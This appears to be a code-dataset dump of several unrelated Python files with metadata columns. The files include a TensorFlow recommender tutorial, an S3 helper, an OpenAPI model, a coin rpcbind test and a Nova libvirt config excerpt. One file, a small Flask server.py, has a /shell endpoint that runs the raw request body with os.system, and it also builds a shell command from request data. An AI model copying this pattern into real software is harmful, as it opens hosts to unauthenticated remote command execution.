theta = tf.multiply(
self.embeddings, tf.reshape(self.weights['product-quadratic-inner'][i], (1, -1, 1)))
quadratic_output.append(tf.reshape(
tf.norm(tf.reduce_sum(theta, axis=1), axis=1), shape=(-1, 1)))
else:
embedding_sum = tf.reduce_sum(self.embeddings, axis=1)
p = tf.matmul(tf.expand_dims(embedding_sum, 2), tf.expand_dims(embedding_sum, 1))
for i in range(self.deep_init_size):
theta = tf.multiply(p, tf.expand_dims(
self.weights['product-quadratic-outer'][i], 0))
quadratic_output.append(tf.reshape(
tf.reduce_sum(theta, axis=[1, 2]), shape=(-1, 1)))
self.lp = tf.concat(quadratic_output, axis=1)
self.y_deep = tf.nn.relu(tf.add(tf.add(self.lz, self.lp), self.weights['product-bias']))
self.y_deep = tf.nn.dropout(self.y_deep, self.dropout_keep_deep[0])
# deep part
for i in range(0, len(self.deep_layers)):
self.y_deep = tf.add(tf.matmul(self.y_deep, self.weights["layer_%d" % i]), self.weights["bias_%d" % i])
self.y_deep = self.deep_layers_activation(self.y_deep)
self.y_deep = tf.nn.dropout(self.y_deep, self.dropout_keep_deep[i+1])
self.out = tf.add(tf.matmul(self.y_deep, self.weights['output']), self.weights['output_bias'])
# loss,代价函数
if self.loss_type == "logloss":
self.out = tf.nn.sigmoid(self.out)
self.loss = tf.losses.log_loss(self.label, self.out)
elif self.loss_type == "mse":
self.loss = tf.nn.l2_loss(tf.subtract(self.label, self.out))
# optimizer,优化器选择
if self.optimizer_type == "adam":
self.optimizer = tf.train.AdamOptimizer(learning_rate=self.learning_rate, beta1=0.9, beta2=0.999,
epsilon=1e-8).minimize(self.loss)
elif self.optimizer_type == "adagrad":
self.optimizer = tf.train.AdagradOptimizer(learning_rate=self.learning_rate,
initial_accumulator_value=1e-8).minimize(self.loss)
elif self.optimizer_type == "gd":
self.optimizer = tf.train.GradientDescentOptimizer(learning_rate=self.learning_rate).minimize(self.loss)
elif self.optimizer_type == "momentum":
self.optimizer = tf.train.MomentumOptimizer(learning_rate=self.learning_rate,
momentum=0.95).minimize(self.loss)
# init
self.saver = tf.train.Saver()
init = tf.global_variables_initializer()
self.sess = tf.Session()
self.sess.run(init)
# number of params
total_parameters = 0
for variable in self.weights.values():
shape = variable.get_shape()
variable_parameters = 1
for dim in shape:
variable_parameters *= dim.value
total_parameters += variable_parameters
if self.verbose > 0:
print("#params: %d" % total_parameters)
def _initialize_weights(self):
weights = dict()
# Sparse Features->Dense Embeddings weight initializing
# one-hot编码后输入到Embedding的权重矩阵初始化
weights['feature_embeddings'] = tf.Variable(tf.random_normal(
[self.feature_size, self.embedding_size], 0.0, 0.01), name='feature_embeddings')
weights['feature_bias'] = tf.Variable(tf.random_normal(
[self.feature_size, 1], 0.0, 1.0), name='feature_bias')
# Product Layers
if self.use_inner:
weights['product-quadratic-inner'] = tf.Variable(tf.random_normal(
[self.deep_init_size, self.field_size], 0.0, 0.01))
else:
weights['product-quadratic-outer'] = tf.Variable(tf.random_normal(
[self.deep_init_size, self.embedding_size, self.embedding_size], 0.0, 0.01))
weights['product-linear'] = tf.Variable(tf.random_normal(
[self.deep_init_size, self.field_size, self.embedding_size], 0.0, 0.01))
weights['product-bias'] = tf.Variable(tf.random_normal([self.deep_init_size, ], 0, 0, 1.0))
# Deep layers weight initializing,Xavier初始化
num_layer = len(self.deep_layers)
input_size = self.deep_init_size
glorot = np.sqrt(2.0/(input_size + self.deep_layers[0])) # var(w)=2/(nin+nout)
weights['layer_0'] = tf.Variable(np.random.normal(
loc=0, scale=glorot, size=(input_size, self.deep_layers[0])), dtype=np.float32)
weights['bias_0'] = tf.Variable(np.random.normal(
loc=0, scale=glorot, size=(1, self.deep_layers[0])), dtype=np.float32)
for i in range(1, num_layer):
glorot = np.sqrt(2.0 / (self.deep_layers[i - 1] + self.deep_layers[i]))
weights["layer_%d" % i] = tf.Variable(np.random.normal(
loc=0, scale=glorot, size=(self.deep_layers[i - 1], self.deep_layers[i])),
dtype=np.float32) # layers[i-1] * layers[i]
weights["bias_%d" % i] = tf.Variable(np.random.normal(
loc=0, scale=glorot, size=(1, self.deep_layers[i])),
dtype=np.float32) # 1 * layer[i]
# final concat projection layer
glorot = np.sqrt(2.0/(input_size + 1))
weights['output'] = tf.Variable(np.random.normal(
loc=0, scale=glorot, size=(self.deep_layers[-1], 1)), dtype=np.float32)
weights['output_bias'] = tf.Variable(tf.constant(0.01), dtype=np.float32)
return weights
# noinspection PyMethodMayBeStatic
def get_batch(self, xi, xv, y, batch_size, index):
start = index * batch_size
end = (index + 1) * batch_size
end = end if end < len(y) else len(y)
return xi[start:end], xv[start:end], [[y_] for y_ in y[start:end]]
# noinspection PyMethodMayBeStatic
def shuffle_in_unison_scary(self, a, b, c):
rng_state = np.random.get_state()
np.random.shuffle(a)
np.random.set_state(rng_state)
np.random.shuffle(b)
np.random.set_state(rng_state)
np.random.shuffle(c)
def predict(self, xi, xv):
feed_dict = {self.feat_index: xi,
self.feat_value: xv,
self.dropout_keep_deep: [1.0] * len(self.dropout_dep),
self.train_phase: True}
out = self.sess.run(self.out, feed_dict=feed_dict)
return out
def evaluate(self, xi, xv, y):
y = [[y_] for y_ in y]
feed_dict = {self.feat_index: xi,
self.feat_value: xv,
self.label: y,
self.dropout_keep_deep: [1.0] * len(self.dropout_dep),
self.train_phase: True}
loss = self.sess.run([self.loss], feed_dict=feed_dict)
return loss
def fit_on_batch(self, xi, xv, y):
feed_dict = {self.feat_index: xi,
self.feat_value: xv,
self.label: y,
self.dropout_keep_deep: self.dropout_dep,
self.train_phase: True}
loss, opt = self.sess.run([self.loss, self.optimizer], feed_dict=feed_dict)
return loss
def fit(self, xi_train, xv_train, y_train, xi_valid=None, xv_valid=None,
y_valid=None, early_stopping=False, refit=False):
"""
:param xi_train: [[ind1_1, ind1_2, ...], ..., [indi_1, indi_2, ..., indi_j, ...], ...]
indi_j is the feature index of feature field j of sample i in the training set
:param xv_train: [[val1_1, val1_2, ...], ..., [vali_1, vali_2, ..., vali_j, ...], ...]
vali_j is the feature value of feature field j of sample i in the training set
vali_j can be either binary (1/0, for binary/categorical features)
:param y_train: label of each sample in the training set
:param xi_valid: list of list of feature indices of each sample in the validation set
:param xv_valid: list of list of feature values of each sample in the validation set
:param y_valid: label of each sample in the validation set
:param early_stopping: perform early stopping or not
:param refit: refit the model on the train+valid dataset or not
:return: None
"""
has_valid = xv_valid is not None
for epoch in range(self.epoch):
t1 = time()
# shuffle the dataset,打乱dataset顺序
self.shuffle_in_unison_scary(xi_train, xv_train, y_train)
total_batch = int(len(y_train) / self.batch_size)
# get batch data and fit them,获得batch数据并fit
for i in range(total_batch):
xi_batch, xv_batch, y_batch = self.get_batch(xi_train, xv_train,
y_train, self.batch_size, i)
self.fit_on_batch(xi_batch, xv_batch, y_batch)
# evaluate training and validation dataset,评价train/valid dataset
train_result = self.evaluate(xi_train, xv_train, y_train)
self.train_result.append(train_result[0])
if has_valid:
valid_result = self.evaluate(xi_valid, xv_valid, y_valid)
self.valid_result.append(valid_result[0])
if self.verbose > 0 and epoch % self.verbose == 0:
if has_valid:
print("[%d] train-loss=%.4f, valid-loss=%.4f [%.1f s]"
% (epoch + 1, train_result[0], valid_result[0], time() - t1))
else:
print("[%d] train-loss=%.4f [%.1f s]"
% (epoch + 1, train_result[0], time() - t1))
if has_valid and early_stopping and self.training_termination(self.valid_result):
break
# fit a few more epoch on train+valid until result reaches the best_train_score
if has_valid and refit:
if self.greater_is_better:
best_valid_score = max(self.valid_result)
else:
best_valid_score = min(self.valid_result)
best_epoch = self.valid_result.index(best_valid_score)
best_train_score = self.train_result[best_epoch]
xi_train = xi_train + xi_valid
xv_train = xv_train + xv_valid
y_train = y_train + y_valid
for epoch in range(100):
self.shuffle_in_unison_scary(xi_train, xv_train, y_train)
total_batch = int(len(y_train) / self.batch_size)
for i in range(total_batch):
xi_batch, xv_batch, y_batch = self.get_batch(xi_train, xv_train,
y_train, self.batch_size, i)
self.fit_on_batch(xi_batch, xv_batch, y_batch)
# check the model performance
train_result = self.evaluate(xi_train, xv_train, y_train)
ckp1 = abs(train_result - best_train_score) < 0.001
ckp2 = self.greater_is_better and train_result > best_train_score
ckp3 = (not self.greater_is_better) and train_result < best_train_score
if ckp1 or ckp2 or ckp3:
break
def training_termination(self, valid_result):
if len(valid_result) > 5:
if self.greater_is_better:
if valid_result[-1] < valid_result[-2] < valid_result[-3] < valid_result[-4] < valid_result[-5]:
return True
else:
if valid_result[-1] > valid_result[-2] > valid_result[-3] > valid_result[-4] > valid_result[-5]:
return True
return False
| tutorials/chapter_05_ProductNN/ProductNN.py | 15,649 | :param xi_train: [[ind1_1, ind1_2, ...], ..., [indi_1, indi_2, ..., indi_j, ...], ...]
indi_j is the feature index of feature field j of sample i in the training set
:param xv_train: [[val1_1, val1_2, ...], ..., [vali_1, vali_2, ..., vali_j, ...], ...]
vali_j is the feature value of feature field j of sample i in the training set
vali_j can be either binary (1/0, for binary/categorical features)
:param y_train: label of each sample in the training set
:param xi_valid: list of list of feature indices of each sample in the validation set
:param xv_valid: list of list of feature values of each sample in the validation set
:param y_valid: label of each sample in the validation set
:param early_stopping: perform early stopping or not
:param refit: refit the model on the train+valid dataset or not
:return: None
!/usr/bin/python -*- coding: utf-8 -*- input data,模型输入 weight initializing,权重初始化 model linear signal quadratic signal deep part loss,代价函数 optimizer,优化器选择 init number of params Sparse Features->Dense Embeddings weight initializing one-hot编码后输入到Embedding的权重矩阵初始化 Product Layers Deep layers weight initializing,Xavier初始化 var(w)=2/(nin+nout) layers[i-1] * layers[i] 1 * layer[i] final concat projection layer noinspection PyMethodMayBeStatic noinspection PyMethodMayBeStatic shuffle the dataset,打乱dataset顺序 get batch data and fit them,获得batch数据并fit evaluate training and validation dataset,评价train/valid dataset fit a few more epoch on train+valid until result reaches the best_train_score check the model performance | 1,582 | en | 0.658959 |
# -*- coding: utf-8 -*-
"""
Created on Tue May 12 00:00:00 2020
@author: Shaji
"""
import boto3
import os
boto3.setup_default_session()
s3_client = boto3.client('s3')
def list_buckets(client=s3_client):
"""
Usage: [arg1]:[initialized s3 client object],
Description: Gets the list of buckets
Returns: [list of buckets]
"""
response = s3_client.list_buckets()
buckets=[]
for bucket in response['Buckets']:
buckets.append(bucket["Name"])
return buckets
def list_objects(bucket,prefix='',client=s3_client):
"""
Usage: [arg1]:[bucket name],[arg2]:[pattern to match keys in s3],[arg3]:[initialized s3 client object],
Description: Gets the keys in the S3 location
Returns: [list of keys], [list of directories]
"""
keys = []
dirs = set()
next_token = ''
base_kwargs = {
'Bucket':bucket,
'Prefix':prefix,
}
while next_token is not None:
kwargs = base_kwargs.copy()
if next_token != '':
kwargs.update({'ContinuationToken': next_token})
results = client.list_objects_v2(**kwargs)
contents = results.get('Contents')
for i in contents:
k = i.get('Key')
keys.append(k)
dirs.add(k[:k.rfind('/')+1])
next_token = results.get('NextContinuationToken')
return keys,list(dirs)
def download_dir(bucket, prefix, local_path, client=s3_client):
"""
Usage: [arg1]:[bucket name],[arg2]:[pattern to match keys in s3],[arg3]:[local path to folder in which to place files],[arg4]:[initialized s3 client object],
Description: Downloads the contents to the local path
"""
keys = []
dirs = set()
next_token = ''
base_kwargs = {
'Bucket':bucket,
'Prefix':prefix,
}
local=local_path+bucket+'\\'
while next_token is not None:
kwargs = base_kwargs.copy()
if next_token != '':
kwargs.update({'ContinuationToken': next_token})
results = client.list_objects_v2(**kwargs)
contents = results.get('Contents')
for i in contents:
k = i.get('Key')
keys.append(k)
dirs.add(k[:k.rfind('/')+1])
next_token = results.get('NextContinuationToken')
for d in dirs:
dest_pathname = os.path.join(local, d)
if not os.path.exists(os.path.dirname(dest_pathname)):
os.makedirs(os.path.dirname(dest_pathname))
for k in keys:
dest_pathname = os.path.join(local, k)
if not os.path.exists(os.path.dirname(dest_pathname)):
os.makedirs(os.path.dirname(dest_pathname))
client.download_file(bucket, k, dest_pathname)
| ctrl4bi/aws_connect.py | 2,775 | Usage: [arg1]:[bucket name],[arg2]:[pattern to match keys in s3],[arg3]:[local path to folder in which to place files],[arg4]:[initialized s3 client object],
Description: Downloads the contents to the local path
Usage: [arg1]:[initialized s3 client object],
Description: Gets the list of buckets
Returns: [list of buckets]
Usage: [arg1]:[bucket name],[arg2]:[pattern to match keys in s3],[arg3]:[initialized s3 client object],
Description: Gets the keys in the S3 location
Returns: [list of keys], [list of directories]
Created on Tue May 12 00:00:00 2020
@author: Shaji
-*- coding: utf-8 -*- | 594 | en | 0.820245 |
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
"""
Submarine Experiment API
The Submarine REST API allows you to create, list, and get experiments. The API is hosted under the /v1/experiment route on the Submarine server. For example, to list experiments on a server hosted at http://localhost:8080, access http://localhost:8080/api/v1/experiment/ # noqa: E501
The version of the OpenAPI document: 0.6.0-SNAPSHOT
Contact: dev@submarine.apache.org
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from submarine.experiment.configuration import Configuration
class KernelSpec(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {"name": "str", "channels": "list[str]", "dependencies": "list[str]"}
attribute_map = {"name": "name", "channels": "channels", "dependencies": "dependencies"}
def __init__(
self, name=None, channels=None, dependencies=None, local_vars_configuration=None
): # noqa: E501
"""KernelSpec - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._name = None
self._channels = None
self._dependencies = None
self.discriminator = None
if name is not None:
self.name = name
if channels is not None:
self.channels = channels
if dependencies is not None:
self.dependencies = dependencies
@property
def name(self):
"""Gets the name of this KernelSpec. # noqa: E501
:return: The name of this KernelSpec. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this KernelSpec.
:param name: The name of this KernelSpec. # noqa: E501
:type: str
"""
self._name = name
@property
def channels(self):
"""Gets the channels of this KernelSpec. # noqa: E501
:return: The channels of this KernelSpec. # noqa: E501
:rtype: list[str]
"""
return self._channels
@channels.setter
def channels(self, channels):
"""Sets the channels of this KernelSpec.
:param channels: The channels of this KernelSpec. # noqa: E501
:type: list[str]
"""
self._channels = channels
@property
def dependencies(self):
"""Gets the dependencies of this KernelSpec. # noqa: E501
:return: The dependencies of this KernelSpec. # noqa: E501
:rtype: list[str]
"""
return self._dependencies
@dependencies.setter
def dependencies(self, dependencies):
"""Sets the dependencies of this KernelSpec.
:param dependencies: The dependencies of this KernelSpec. # noqa: E501
:type: list[str]
"""
self._dependencies = dependencies
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(
map(lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value)
)
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(
map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict")
else item,
value.items(),
)
)
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, KernelSpec):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, KernelSpec):
return True
return self.to_dict() != other.to_dict()
| submarine-sdk/pysubmarine/submarine/experiment/models/kernel_spec.py | 5,683 | NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Returns true if both objects are equal
KernelSpec - a model defined in OpenAPI
Returns true if both objects are not equal
For `print` and `pprint`
Gets the channels of this KernelSpec. # noqa: E501
:return: The channels of this KernelSpec. # noqa: E501
:rtype: list[str]
Sets the channels of this KernelSpec.
:param channels: The channels of this KernelSpec. # noqa: E501
:type: list[str]
Gets the dependencies of this KernelSpec. # noqa: E501
:return: The dependencies of this KernelSpec. # noqa: E501
:rtype: list[str]
Sets the dependencies of this KernelSpec.
:param dependencies: The dependencies of this KernelSpec. # noqa: E501
:type: list[str]
Gets the name of this KernelSpec. # noqa: E501
:return: The name of this KernelSpec. # noqa: E501
:rtype: str
Sets the name of this KernelSpec.
:param name: The name of this KernelSpec. # noqa: E501
:type: str
Returns the model properties as a dict
Returns the string representation of the model
Submarine Experiment API
The Submarine REST API allows you to create, list, and get experiments. The API is hosted under the /v1/experiment route on the Submarine server. For example, to list experiments on a server hosted at http://localhost:8080, access http://localhost:8080/api/v1/experiment/ # noqa: E501
The version of the OpenAPI document: 0.6.0-SNAPSHOT
Contact: dev@submarine.apache.org
Generated by: https://openapi-generator.tech
Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to You under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. coding: utf-8 noqa: F401 noqa: E501 noqa: E501 | 2,339 | en | 0.767156 |
# Proton JS - Proton.py
# by Acropolis Point
# module imports
import os
import json
import time
from flask import Flask, jsonify, request, render_template
app = Flask(__name__)
@app.route('/new', methods=['POST'])
# new() function definition
def new():
os.system("python3 window.py " + request.get_data(as_text = True))
return 'OK'
@app.route('/shell', methods=['POST'])
# shell() function definition
def shell():
os.system(request.get_data(as_text = True))
return 'OK'
@app.route('/filesave', methods=['POST'])
def filesave():
theFile = open(request.get_data(as_text = True).split(", ")[1], "w+")
theFile.write(request.get_data(as_text = True).split(", ")[0])
return 'OK'
@app.route('/close', methods=['POST'])
def close():
theFile = open("output.json", "r+")
theFileParsed = json.load(theFile)
theFileParsed['close'] = request.get_data(as_text = True)
theFile.seek(0)
theFile.write(json.dumps(theFileParsed) + " ")
time.sleep(200)
theFile.write("{ \"close\": \"\" }")
return 'OK'
| server.py | 1,055 | Proton JS - Proton.py by Acropolis Point module imports new() function definition shell() function definition | 109 | en | 0.291815 |
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Copyright (c) 2017 The Californiacoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test running californiacoind with the -rpcbind and -rpcallowip options."""
import socket
import sys
from test_framework.test_framework import CaliforniacoinTestFramework, SkipTest
from test_framework.util import *
from test_framework.netutil import *
class RPCBindTest(CaliforniacoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def setup_network(self):
self.add_nodes(self.num_nodes, None)
def run_bind_test(self, allow_ips, connect_to, addresses, expected):
'''
Start a node with requested rpcallowip and rpcbind parameters,
then try to connect, and check if the set of bound addresses
matches the expected set.
'''
self.log.info("Bind test for %s" % str(addresses))
expected = [(addr_to_hex(addr), port) for (addr, port) in expected]
base_args = ['-disablewallet', '-nolisten']
if allow_ips:
base_args += ['-rpcallowip=' + x for x in allow_ips]
binds = ['-rpcbind='+addr for addr in addresses]
self.nodes[0].rpchost = connect_to
self.start_node(0, base_args + binds)
pid = self.nodes[0].process.pid
assert_equal(set(get_bind_addrs(pid)), set(expected))
self.stop_nodes()
def run_allowip_test(self, allow_ips, rpchost, rpcport):
'''
Start a node with rpcallow IP, and request getnetworkinfo
at a non-localhost IP.
'''
self.log.info("Allow IP test for %s:%d" % (rpchost, rpcport))
base_args = ['-disablewallet', '-nolisten'] + ['-rpcallowip='+x for x in allow_ips]
self.nodes[0].rpchost = None
self.start_nodes([base_args])
# connect to node through non-loopback interface
node = get_rpc_proxy(rpc_url(get_datadir_path(self.options.tmpdir, 0), 0, "%s:%d" % (rpchost, rpcport)), 0, coveragedir=self.options.coveragedir)
node.getnetworkinfo()
self.stop_nodes()
def run_test(self):
# due to OS-specific network stats queries, this test works only on Linux
if not sys.platform.startswith('linux'):
raise SkipTest("This test can only be run on linux.")
# find the first non-loopback interface for testing
non_loopback_ip = None
for name,ip in all_interfaces():
if ip != '127.0.0.1':
non_loopback_ip = ip
break
if non_loopback_ip is None:
raise SkipTest("This test requires at least one non-loopback IPv4 interface.")
try:
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect(("::1",1))
s.close
except OSError:
raise SkipTest("This test requires IPv6 support.")
self.log.info("Using interface %s for testing" % non_loopback_ip)
defaultport = rpc_port(0)
# check default without rpcallowip (IPv4 and IPv6 localhost)
self.run_bind_test(None, '127.0.0.1', [],
[('127.0.0.1', defaultport), ('::1', defaultport)])
# check default with rpcallowip (IPv6 any)
self.run_bind_test(['127.0.0.1'], '127.0.0.1', [],
[('::0', defaultport)])
# check only IPv4 localhost (explicit)
self.run_bind_test(['127.0.0.1'], '127.0.0.1', ['127.0.0.1'],
[('127.0.0.1', defaultport)])
# check only IPv4 localhost (explicit) with alternative port
self.run_bind_test(['127.0.0.1'], '127.0.0.1:32171', ['127.0.0.1:32171'],
[('127.0.0.1', 32171)])
# check only IPv4 localhost (explicit) with multiple alternative ports on same host
self.run_bind_test(['127.0.0.1'], '127.0.0.1:32171', ['127.0.0.1:32171', '127.0.0.1:32172'],
[('127.0.0.1', 32171), ('127.0.0.1', 32172)])
# check only IPv6 localhost (explicit)
self.run_bind_test(['[::1]'], '[::1]', ['[::1]'],
[('::1', defaultport)])
# check both IPv4 and IPv6 localhost (explicit)
self.run_bind_test(['127.0.0.1'], '127.0.0.1', ['127.0.0.1', '[::1]'],
[('127.0.0.1', defaultport), ('::1', defaultport)])
# check only non-loopback interface
self.run_bind_test([non_loopback_ip], non_loopback_ip, [non_loopback_ip],
[(non_loopback_ip, defaultport)])
# Check that with invalid rpcallowip, we are denied
self.run_allowip_test([non_loopback_ip], non_loopback_ip, defaultport)
assert_raises_rpc_error(-342, "non-JSON HTTP response with '403 Forbidden' from server", self.run_allowip_test, ['1.1.1.1'], non_loopback_ip, defaultport)
if __name__ == '__main__':
RPCBindTest().main()
| test/functional/rpcbind_test.py | 4,951 | Start a node with rpcallow IP, and request getnetworkinfo
at a non-localhost IP.
Start a node with requested rpcallowip and rpcbind parameters,
then try to connect, and check if the set of bound addresses
matches the expected set.
Test running californiacoind with the -rpcbind and -rpcallowip options.
!/usr/bin/env python3 Copyright (c) 2014-2016 The Bitcoin Core developers Copyright (c) 2017 The Californiacoin Core developers Distributed under the MIT software license, see the accompanying file COPYING or http://www.opensource.org/licenses/mit-license.php. connect to node through non-loopback interface due to OS-specific network stats queries, this test works only on Linux find the first non-loopback interface for testing check default without rpcallowip (IPv4 and IPv6 localhost) check default with rpcallowip (IPv6 any) check only IPv4 localhost (explicit) check only IPv4 localhost (explicit) with alternative port check only IPv4 localhost (explicit) with multiple alternative ports on same host check only IPv6 localhost (explicit) check both IPv4 and IPv6 localhost (explicit) check only non-loopback interface Check that with invalid rpcallowip, we are denied | 1,178 | en | 0.717955 |
# needs:fix_opt_description
# needs:check_deprecation_status
# needs:check_opt_group_and_type
# needs:fix_opt_description_indentation
# needs:fix_opt_registration_consistency
# Copyright 2016 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
from oslo_config import cfg
from nova.conf import paths
# Downtime period in milliseconds
LIVE_MIGRATION_DOWNTIME_MIN = 100
# Step count
LIVE_MIGRATION_DOWNTIME_STEPS_MIN = 3
# Delay in seconds
LIVE_MIGRATION_DOWNTIME_DELAY_MIN = 10
libvirt_group = cfg.OptGroup("libvirt",
title="Libvirt Options",
help="""
Libvirt options allows cloud administrator to configure related
libvirt hypervisor driver to be used within an OpenStack deployment.
Almost all of the libvirt config options are influence by ``virt_type`` config
which describes the virtualization type (or so called domain type) libvirt
should use for specific features such as live migration, snapshot.
""")
libvirt_general_opts = [
cfg.StrOpt('rescue_image_id',
help="""
The ID of the image to boot from to rescue data from a corrupted instance.
If the rescue REST API operation doesn't provide an ID of an image to
use, the image which is referenced by this ID is used. If this
option is not set, the image from the instance is used.
Possible values:
* An ID of an image or nothing. If it points to an *Amazon Machine
Image* (AMI), consider to set the config options ``rescue_kernel_id``
and ``rescue_ramdisk_id`` too. If nothing is set, the image of the instance
is used.
Related options:
* ``rescue_kernel_id``: If the chosen rescue image allows the separate
definition of its kernel disk, the value of this option is used,
if specified. This is the case when *Amazon*'s AMI/AKI/ARI image
format is used for the rescue image.
* ``rescue_ramdisk_id``: If the chosen rescue image allows the separate
definition of its RAM disk, the value of this option is used if,
specified. This is the case when *Amazon*'s AMI/AKI/ARI image
format is used for the rescue image.
"""),
cfg.StrOpt('rescue_kernel_id',
help="""
The ID of the kernel (AKI) image to use with the rescue image.
If the chosen rescue image allows the separate definition of its kernel
disk, the value of this option is used, if specified. This is the case
when *Amazon*'s AMI/AKI/ARI image format is used for the rescue image.
Possible values:
* An ID of an kernel image or nothing. If nothing is specified, the kernel
disk from the instance is used if it was launched with one.
Related options:
* ``rescue_image_id``: If that option points to an image in *Amazon*'s
AMI/AKI/ARI image format, it's useful to use ``rescue_kernel_id`` too.
"""),
cfg.StrOpt('rescue_ramdisk_id',
help="""
The ID of the RAM disk (ARI) image to use with the rescue image.
If the chosen rescue image allows the separate definition of its RAM
disk, the value of this option is used, if specified. This is the case
when *Amazon*'s AMI/AKI/ARI image format is used for the rescue image.
Possible values:
* An ID of a RAM disk image or nothing. If nothing is specified, the RAM
disk from the instance is used if it was launched with one.
Related options:
* ``rescue_image_id``: If that option points to an image in *Amazon*'s
AMI/AKI/ARI image format, it's useful to use ``rescue_ramdisk_id`` too.
"""),
cfg.StrOpt('virt_type',
default='kvm',
choices=('kvm', 'lxc', 'qemu', 'uml', 'xen', 'parallels'),
help="""
Describes the virtualization type (or so called domain type) libvirt should
use.
The choice of this type must match the underlying virtualization strategy
you have chosen for this host.
Possible values:
* See the predefined set of case-sensitive values.
Related options:
* ``connection_uri``: depends on this
* ``disk_prefix``: depends on this
* ``cpu_mode``: depends on this
* ``cpu_model``: depends on this
"""),
cfg.StrOpt('connection_uri',
default='',
help="""
Overrides the default libvirt URI of the chosen virtualization type.
If set, Nova will use this URI to connect to libvirt.
Possible values:
* An URI like ``qemu:///system`` or ``xen+ssh://oirase/`` for example.
This is only necessary if the URI differs to the commonly known URIs
for the chosen virtualization type.
Related options:
* ``virt_type``: Influences what is used as default value here.
"""),
cfg.BoolOpt('inject_password',
default=False,
help="""
Allow the injection of an admin password for instance only at ``create`` and
``rebuild`` process.
There is no agent needed within the image to do this. If *libguestfs* is
available on the host, it will be used. Otherwise *nbd* is used. The file
system of the image will be mounted and the admin password, which is provided
in the REST API call will be injected as password for the root user. If no
root user is available, the instance won't be launched and an error is thrown.
Be aware that the injection is *not* possible when the instance gets launched
from a volume.
Possible values:
* True: Allows the injection.
* False (default): Disallows the injection. Any via the REST API provided
admin password will be silently ignored.
Related options:
* ``inject_partition``: That option will decide about the discovery and usage
of the file system. It also can disable the injection at all.
"""),
cfg.BoolOpt('inject_key',
default=False,
help="""
Allow the injection of an SSH key at boot time.
There is no agent needed within the image to do this. If *libguestfs* is
available on the host, it will be used. Otherwise *nbd* is used. The file
system of the image will be mounted and the SSH key, which is provided
in the REST API call will be injected as SSH key for the root user and
appended to the ``authorized_keys`` of that user. The SELinux context will
be set if necessary. Be aware that the injection is *not* possible when the
instance gets launched from a volume.
This config option will enable directly modifying the instance disk and does
not affect what cloud-init may do using data from config_drive option or the
metadata service.
Related options:
* ``inject_partition``: That option will decide about the discovery and usage
of the file system. It also can disable the injection at all.
"""),
cfg.IntOpt('inject_partition',
default=-2,
min=-2,
help="""
Determines the way how the file system is chosen to inject data into it.
*libguestfs* will be used a first solution to inject data. If that's not
available on the host, the image will be locally mounted on the host as a
fallback solution. If libguestfs is not able to determine the root partition
(because there are more or less than one root partition) or cannot mount the
file system it will result in an error and the instance won't be boot.
Possible values:
* -2 => disable the injection of data.
* -1 => find the root partition with the file system to mount with libguestfs
* 0 => The image is not partitioned
* >0 => The number of the partition to use for the injection
Related options:
* ``inject_key``: If this option allows the injection of a SSH key it depends
on value greater or equal to -1 for ``inject_partition``.
* ``inject_password``: If this option allows the injection of an admin password
it depends on value greater or equal to -1 for ``inject_partition``.
* ``guestfs`` You can enable the debug log level of libguestfs with this
config option. A more verbose output will help in debugging issues.
* ``virt_type``: If you use ``lxc`` as virt_type it will be treated as a
single partition image
"""),
cfg.BoolOpt('use_usb_tablet',
default=True,
deprecated_for_removal=True,
deprecated_reason="This option is being replaced by the "
"'pointer_model' option.",
deprecated_since='14.0.0',
help="""
